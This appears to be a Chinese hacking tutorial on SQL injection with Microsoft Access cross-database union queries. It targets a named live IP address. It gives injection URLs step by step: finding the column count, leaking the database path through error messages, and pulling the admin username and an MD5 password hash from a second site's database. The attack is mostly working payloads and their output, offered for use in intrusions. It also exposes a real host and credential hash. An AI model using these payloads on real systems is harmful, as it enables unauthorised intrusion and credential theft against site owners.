Access跨库查询

核心提示： 我们得知雨点系统的list.asp可以注射，我们先去要得到union里的数据表字段数，Access跨库查询(2)，提交：http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo返回：Microsoft JET D

　　我们得知雨点系统的list.asp可以注射，我们先去要得到union里的数据表字段数，提交：

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

　　返回：

　　Microsoft JET Database Engine 错误 '80040e14'

　　在联合查询中所选定的两个数据表或查询中的列数不匹配。

　　/yddown/list.asp，行51

　　字段不对，我写了个perl脚本自动猜，（代码见后）

　　当我们提交：

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

　　无错误返回：



　　我们已经得到字段数了，并且我们可以得到在字段1的我位置，可以显示我们查询的数据。

　　现在还就差盗帅的数据库位置了，简单我们暴库，提交：

http://219.237.81.46/dsdown%5cregs.asp

　　成功返回路径：

　　Microsoft JET Database Engine 错误 '80004005'

　　'D:\111\db\kljdsld.asa'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

　　/dsdown/db/user.asp，行6

　　（注意：这样得到的的路径不一定是“完整”的，真正的路径为：D:\111\dsdown\db\kljdsld.asa）

　　下面我们跨库，构造url如下：

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

　　上面的语句是，union查询数据D:\111\db\kljdsld.asa里表admin里id=1的字段admin的数据，如果成功将直接暴出后台管理的用户名：



　　得到用户名为admin 我们接着暴密码：

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1

　　如图：



　　得到密码为32位的md5加密的hash：77e6cbb3f9468eadb655ae6826357922，我们跨库查询成功，这里我只是为大家演示下跨库查询，黑防那里就不管咯。

小结

　　本文主要是给大家介绍了2个非常有用的方法，第1 我们在asp注射时不一顶要一个个字符去猜，那样遇到中文的很麻烦，直接用union替代数据可以直接暴出数据，不关是中文还是特殊字符，都可以一步到位，第2 就是跨库了，使用很灵活，可以让你在渗透时，有意想不到的收获。